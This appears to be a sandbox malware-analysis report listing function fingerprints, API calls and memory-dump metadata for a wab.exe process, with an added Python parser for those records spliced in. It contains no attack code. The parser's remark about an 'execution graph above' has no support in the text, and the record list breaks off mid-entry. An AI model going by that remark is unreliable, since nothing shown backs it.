                                  Function_24882F30, Function_24819939, Function_2481D43A, Function_2481283D, Function_2481CD41, Function_24813F40, Function_2481DA46, Function_24884340, Function_2481B14A, Function_24884650, Function_2481CF59, Function_2481DA5A,
                                  Function_2481225F, Function_24812860, Function_24882B60, Function_24882C60, Function_24882F60, Function_075EE1B4, Function_2481E56F, Function_24819973, Function_24882C70, Function_24883D70, Function_2481CD79, Function_2481D37E

                                  Control-flow Graph

                                  APIs
                                  • Sleep.KERNELBASE(00000005), ref: 075EE83C
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-0000001C,-00000018), ref: 075EE882
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3232163067.000000000700E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0700E000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_700e000_wab.jbxd
                                  Similarity
                                  • API ID: MemoryProtectSleepVirtual
                                  • String ID:
                                  • API String ID: 3235210055-0
                                  • Opcode ID: 068993398ccff768fde3d20ba4250dc6d23ed0334ca0658cace9112dd7114050
                                  • Instruction ID: cd9d1a8284805c69b224990ba4c2d195545c2489e91a2715a84b58d013da13b2
                                  • Opcode Fuzzy Hash: 068993398ccff768fde3d20ba4250dc6d23ed0334ca0658cace9112dd7114050
                                  • Instruction Fuzzy Hash: F81157F1911301AFF7444E24C8CDB8A73A9BF11328F968196C9008F2A2E774C885CB42
                                  Uniqueness

                                  Uniqueness Score: -1.00%
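                                  The per-function records in this section all share one layout: an optional APIs list, a Memory Dump Source, the Snapshot File and the Similarity fingerprints (Opcode ID, Instruction ID and the two fuzzy hashes). The following parser is an added example, not part of this report or of Joe Sandbox, that reads such records from the plain-text export, groups them by Opcode ID and flags any function whose API list includes a memory-protection call such as the NtProtectVirtualMemory seen in the record above. It assumes that the Opcode ID (which in every record here equals the Opcode Fuzzy Hash) is operand-insensitive and the Instruction ID operand-sensitive, so two records with the same Opcode ID but different Instruction IDs are the same opcode sequence with different operands; it also assumes the snapshot file naming hcaresult_<pid>_<run>_<base>_<image>.jbxd inferred from the records on this page. The sample input is three records copied from this report, trimmed to the lines the parser uses.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed input: three records copied from this report, trimmed to the
# lines the parser consumes (fuzzy-hash and empty ID lines dropped).
SAMPLE = """\
APIs
• Sleep.KERNELBASE(00000005), ref: 075EE83C
• NtProtectVirtualMemory.NTDLL(000000FF,-0000001C,-00000018), ref: 075EE882
Memory Dump Source
• Source File: 00000011.00000002.3232163067.000000000700E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0700E000, based on PE: false
• Snapshot File: hcaresult_17_2_700e000_wab.jbxd
• API ID: MemoryProtectSleepVirtual
• Opcode ID: 068993398ccff768fde3d20ba4250dc6d23ed0334ca0658cace9112dd7114050
• Instruction ID: cd9d1a8284805c69b224990ba4c2d195545c2489e91a2715a84b58d013da13b2
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
• Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
• API ID:
• Opcode ID: dbc71043e440707c9b8065cd262169d3adcc7c18d00be0319446f40f6729d9a5
• Instruction ID: 2da6e98f5049a230f88c4a52875494edbf4faa8407fb222239a0e82f994ff6e3
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
• Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
• API ID:
• Opcode ID: dbc71043e440707c9b8065cd262169d3adcc7c18d00be0319446f40f6729d9a5
• Instruction ID: 7541d93fbad16238a72424644db00443d39e0723e9cda6a06598fa0b1e51a9dc
Uniqueness Score: -1.00%
"""

# APIs worth flagging in an unpacker/loader; this set is the example's own choice.
MEMORY_PROTECTION_APIS = {"NtProtectVirtualMemory", "ZwProtectVirtualMemory",
                          "VirtualProtect", "VirtualProtectEx"}

_API_RE = re.compile(r"^\s*•\s*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")
_KV_RE = re.compile(r"^\s*•\s*([^:]+?):\s*(.*?)\s*$")
_SRC_RE = re.compile(r"(\S+\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
# Assumed naming: hcaresult_<pid>_<run>_<base>_<image>.jbxd (inferred from this report).
_SNAP_RE = re.compile(r"hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_(.+?)\.jbxd")


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    instruction_id: str = ""
    api_id: str = ""
    source_file: str = ""
    offset: int = 0
    based_on_pe: bool = False
    pid: int = 0
    image: str = ""
    apis: list = field(default_factory=list)  # (api, module, args, ref)


def parse_records(text):
    """One record per 'Uniqueness Score' line; chunks without an Opcode ID are skipped."""
    records = []
    for chunk in re.split(r"Uniqueness Score:[^\n]*\n?", text):
        if "Opcode ID:" not in chunk:
            continue
        rec = FunctionRecord()
        for line in chunk.splitlines():
            m = _API_RE.match(line)
            if m:  # e.g. "• Sleep.KERNELBASE(00000005), ref: 075EE83C"
                rec.apis.append(m.groups())
                continue
            m = _KV_RE.match(line)
            if not m:
                continue
            key, value = m.groups()
            if key == "Opcode ID":
                rec.opcode_id = value
            elif key == "Instruction ID":
                rec.instruction_id = value
            elif key == "API ID":
                rec.api_id = value
            elif key == "Source File":
                s = _SRC_RE.search(value)
                if s:
                    rec.source_file, rec.offset = s.group(1), int(s.group(2), 16)
                    rec.based_on_pe = s.group(3) == "true"
            elif key == "Snapshot File":
                s = _SNAP_RE.search(value)
                if s:  # "wab.1" -> "wab": the trailing ".1" is a dump iteration, not the image
                    rec.pid, rec.image = int(s.group(1)), s.group(4).split(".")[0]
        records.append(rec)
    return records


def group_by_opcode(records):
    groups = defaultdict(list)
    for rec in records:
        groups[rec.opcode_id].append(rec)
    return dict(groups)


def opcode_twins(records):
    """Opcode IDs shared by records whose Instruction IDs differ: same opcode
    sequence, different operands (the assumed meaning of the two fingerprints)."""
    return {oid: recs for oid, recs in group_by_opcode(records).items()
            if len({r.instruction_id for r in recs}) > 1}


def memory_protection_records(records):
    """Records whose resolved API list touches page protections."""
    return [r for r in records
            if any(api in MEMORY_PROTECTION_APIS for api, *_ in r.apis)]
```

                                  Run over the full export, opcode_twins() lists the fingerprints that recur with different operands (here dbc71043... in the 08973000 dump of wab.exe, PID 17), and memory_protection_records() isolates the single 0700E000 function that combines Sleep with NtProtectVirtualMemory, which is the function the execution graph above shows looping.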

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (1 block): 248835c0-248835cc LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8f16e72dc68fed47d5e875ef19efe74c7463721ae690f6b390ad7bd148c1ba93
                                  • Instruction ID: 6804a76534251230167caec1ba619bfa316bc97b8945e3e49db85725e3481500
                                  • Opcode Fuzzy Hash: 8f16e72dc68fed47d5e875ef19efe74c7463721ae690f6b390ad7bd148c1ba93
                                  • Instruction Fuzzy Hash: E390023162990546D1007158495470610855BD0205F65C511B0429538D8795CA9565A7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (1 block): 24882df0-24882dfc LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c3d139e1806ffdc00b728b0fd4ea6494f78808c65dbc505d97b2aab067856c33
                                  • Instruction ID: 1b77e252bbabb00866b02d0bf4e9b67d8cec7946816b32a08cba301604d22588
                                  • Opcode Fuzzy Hash: c3d139e1806ffdc00b728b0fd4ea6494f78808c65dbc505d97b2aab067856c33
                                  • Instruction Fuzzy Hash: A890023122580557D1117158494470700895BD0245F95C512B0429528D9656CA96A126
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (1 block): 24882b60-24882b6c LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1d6ee2e7f2f287c90e3bedad660d01ef5dac3a788af0fb2ed073483ff3b08679
                                  • Instruction ID: ff4795e92284c86fda5e9ed90194b1171bf996c9764237506f0c238760929485
                                  • Opcode Fuzzy Hash: 1d6ee2e7f2f287c90e3bedad660d01ef5dac3a788af0fb2ed073483ff3b08679
                                  • Instruction Fuzzy Hash: 0A90027122680147410571584854616408A5BE0205B55C121F1019560DC525C9D5612A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (1 block): 24882c70-24882c7c LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: aab65206597543a4f9e906199c4a38f9ee07fe70f648a84cac1f8180cae09e2a
                                  • Instruction ID: c1c338ccc5a241f9b07c448ed5d7e57b477304b8ecd162c4d5dfeb1353a6beab
                                  • Opcode Fuzzy Hash: aab65206597543a4f9e906199c4a38f9ee07fe70f648a84cac1f8180cae09e2a
                                  • Instruction Fuzzy Hash: E590023122588946D1107158884474A00855BD0305F59C511B4429628D8695C9D57126
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (3 blocks), edges:
                                  • 24882c0a-24882c0f -> 24882c1f-24882c26 (LdrInitializeThunk)
                                  • 24882c0a-24882c0f -> 24882c11-24882c18
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 873d4273f3c073eeec26be79893861a22b98eaab83b39a56f6477ab493406087
                                  • Instruction ID: 3cf9e9f3fbfba61150e1de46364082271b478736b0b26520f37e0dcb90cff6d8
                                  • Opcode Fuzzy Hash: 873d4273f3c073eeec26be79893861a22b98eaab83b39a56f6477ab493406087
                                  • Instruction Fuzzy Hash: 79B09B719159C5C9D701E7604A0871779417BD0705F15C161E2034655F4738C5D5E177
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4c661cce99cec34ff2007b1a6e93b3427a32ec8347f7795dabe43d169f2e9cf3
                                  • Instruction ID: 9ca9c9d46ab86ed85b6ee241fcc8da9c8c8abb2bdfb659329fadfe2d9e8ea74a
                                  • Opcode Fuzzy Hash: 4c661cce99cec34ff2007b1a6e93b3427a32ec8347f7795dabe43d169f2e9cf3
                                  • Instruction Fuzzy Hash: AE726E30250602DFCF54BF60DF59BA93B75AB49B49F0405ACE9867B2B3DB365809CB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eeb157df87bbcfc91732da1d0c5f8f4dc5e0bb4ee753022611ea933d3a552aae
                                  • Instruction ID: d7f0d124ae0544c888d637ed483833f722f2aae8ee286558e4941c35da60334f
                                  • Opcode Fuzzy Hash: eeb157df87bbcfc91732da1d0c5f8f4dc5e0bb4ee753022611ea933d3a552aae
                                  • Instruction Fuzzy Hash: 88519F35700612DBDB25BF24DD4CB6DB7B9AF98706F0100ADE906AB3A1CB345D468B9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 74f9c0b13054e787c004682c2cd6dcbf6ce208bbb9517c204476cffccabe2f4c
                                  • Instruction ID: dc02731c2107e94ad717bb4f432818af5ba675bc97641ee79a6b19ae33156a55
                                  • Opcode Fuzzy Hash: 74f9c0b13054e787c004682c2cd6dcbf6ce208bbb9517c204476cffccabe2f4c
                                  • Instruction Fuzzy Hash: 035180357005119BDB15AB24DD8CBADB7B9AB88706F0400BDE90ABB3A1CF345D46CA9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1589e8e2b159b46beb01b5ea036c300722db3e5755bcbf17bb92d006d639e37f
                                  • Instruction ID: 6284fb8e1bb5b62c5a83407e3b1621cfb721c6fe2ad6d810b01b8564842bd981
                                  • Opcode Fuzzy Hash: 1589e8e2b159b46beb01b5ea036c300722db3e5755bcbf17bb92d006d639e37f
                                  • Instruction Fuzzy Hash: 5C31A0317002119BEB247B649D5CBBD77AAAB84756F040139E942FB3E1DB749C01CA98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 326ce25b7d1e8210008b066c75345e64c1c14418a8f055077ee9c1b79b16ecd3
                                  • Instruction ID: bbc2fb1e18ee16271ef889fbe1eec5c349b53b2738cfefe79d6a482f3e8e0b5d
                                  • Opcode Fuzzy Hash: 326ce25b7d1e8210008b066c75345e64c1c14418a8f055077ee9c1b79b16ecd3
                                  • Instruction Fuzzy Hash: 04317035700213DBEB247B649D58BBD77AAAF84756F050139E942EB3D1DB748C028B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c5572fe8438d85ee2e19526aa25181d1d7c407427cb8ced85a688263d1fa5e53
                                  • Instruction ID: 7a96cf396267788b69806a8f198acf2748699baec46b4fe0791d8ee7e9781d84
                                  • Opcode Fuzzy Hash: c5572fe8438d85ee2e19526aa25181d1d7c407427cb8ced85a688263d1fa5e53
                                  • Instruction Fuzzy Hash: 81F0E232381620B7D6323B449D09F5ABB599F80F62F040036FE457B3E2DA758811C6DD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3db8bda626738f0cf0f2fa3a517e896673731513f39b0a7f53b8b696412e60d9
                                  • Instruction ID: 8e3e8cae11ac21603e5c42003375882fb52471be1cf071ab1296d1dad2950797
                                  • Opcode Fuzzy Hash: 3db8bda626738f0cf0f2fa3a517e896673731513f39b0a7f53b8b696412e60d9
                                  • Instruction Fuzzy Hash: 11F0E932340712A7D7313B545C09F5ABB599F80F62F044429FE457B3D1CA758801C6DC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e16d178ca8311f27cc336fdb09d46127454a2597f288a288655f2f51bd576da4
                                  • Instruction ID: b859962b841d2461b6dd5b4f1d3b65b887de21cf9d87d0c453e429f084d39a36
                                  • Opcode Fuzzy Hash: e16d178ca8311f27cc336fdb09d46127454a2597f288a288655f2f51bd576da4
                                  • Instruction Fuzzy Hash: 91D0C23224226467C3216B549D0CB827E5CEB40B61F08402ABD08A72A1CAB1CD40C2C4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dbc71043e440707c9b8065cd262169d3adcc7c18d00be0319446f40f6729d9a5
                                  • Instruction ID: 2da6e98f5049a230f88c4a52875494edbf4faa8407fb222239a0e82f994ff6e3
                                  • Opcode Fuzzy Hash: dbc71043e440707c9b8065cd262169d3adcc7c18d00be0319446f40f6729d9a5
                                  • Instruction Fuzzy Hash: F6D01232241265A7C3217B559D08F96BF5CEF81B65F054069BE069B261C675DC40C6D8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dbc71043e440707c9b8065cd262169d3adcc7c18d00be0319446f40f6729d9a5
                                  • Instruction ID: 7541d93fbad16238a72424644db00443d39e0723e9cda6a06598fa0b1e51a9dc
                                  • Opcode Fuzzy Hash: dbc71043e440707c9b8065cd262169d3adcc7c18d00be0319446f40f6729d9a5
                                  • Instruction Fuzzy Hash: 4AD0C232241268A7C3212B559D0CF82BF6CEB40B62F044439FE04B7261C671DC40C2C8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cfd5fd5db120f6979afac7d7c615b2f32ae06d6959f0ab16ad67cb83fa2cc11b
                                  • Instruction ID: 4de0d1debea302eceae57b81bb3b61120cef123035efe887bdac31f1f154adaa
                                  • Opcode Fuzzy Hash: cfd5fd5db120f6979afac7d7c615b2f32ae06d6959f0ab16ad67cb83fa2cc11b
                                  • Instruction Fuzzy Hash: A6D0C232141265A7C32177548D04F867E5C8F40B66F080025BD044765085A1CC40C6C8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cfd5fd5db120f6979afac7d7c615b2f32ae06d6959f0ab16ad67cb83fa2cc11b
                                  • Instruction ID: 1ae18c9d3e0c1f350f7e38f8a4f21c1c0daa20e540e1b789d4f97a6010fa1ae4
                                  • Opcode Fuzzy Hash: cfd5fd5db120f6979afac7d7c615b2f32ae06d6959f0ab16ad67cb83fa2cc11b
                                  • Instruction Fuzzy Hash: E1D05BB2141268A7C33177A59D08FA67F5CDBC1B66F054435BF0457291C575DC40C2D8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aff5ca15ec7a5f1ec7aacec573f51e56e27458f7899e97daf979d5baa072373e
                                  • Instruction ID: a0ec0f7238261532da8756c6e45ff5f82b85aae6b873263a1bf08fa92f330765
                                  • Opcode Fuzzy Hash: aff5ca15ec7a5f1ec7aacec573f51e56e27458f7899e97daf979d5baa072373e
                                  • Instruction Fuzzy Hash: 8090023122580946D10471584C4468600855BD0305F55C111B6029625E9665C9D57136
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 184a119ec2ab5e6a933845fcc602408b458cedaba6d7542947db054913c575ce
                                  • Instruction ID: 49a1b9250c77c851b6998a6d1fd611404765f123f470044fb67183d3d47fa835
                                  • Opcode Fuzzy Hash: 184a119ec2ab5e6a933845fcc602408b458cedaba6d7542947db054913c575ce
                                  • Instruction Fuzzy Hash: 8C90023162580646D10171584844616008A5BD0245F95C122B1029525ECA25CAD6A136
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c2ad46da754794467f11b6c6989659728f2991f16e95df24ec250953d64254f
                                  • Instruction ID: a5d86ba0e61030f309367a28fde1eb5b77981b7d1ff61eb550b66cbaa55710f3
                                  • Opcode Fuzzy Hash: 9c2ad46da754794467f11b6c6989659728f2991f16e95df24ec250953d64254f
                                  • Instruction Fuzzy Hash: 8D900231225C0546D10071584C5470B00855BD0306F55C111B1169525D8625C9956576
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5a94883b228a534e0ed38ad9e4af96bfd69786f19e630bb192a2e7c9c13f8c70
                                  • Instruction ID: 6a24e9d5641b39e7a58649a3d4bab3ed0ff44bd466b20a945785f9136de37c71
                                  • Opcode Fuzzy Hash: 5a94883b228a534e0ed38ad9e4af96bfd69786f19e630bb192a2e7c9c13f8c70
                                  • Instruction Fuzzy Hash: EF90023126580946D1407158885470700869BD0605F55C111B0029524D8616CAA966B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
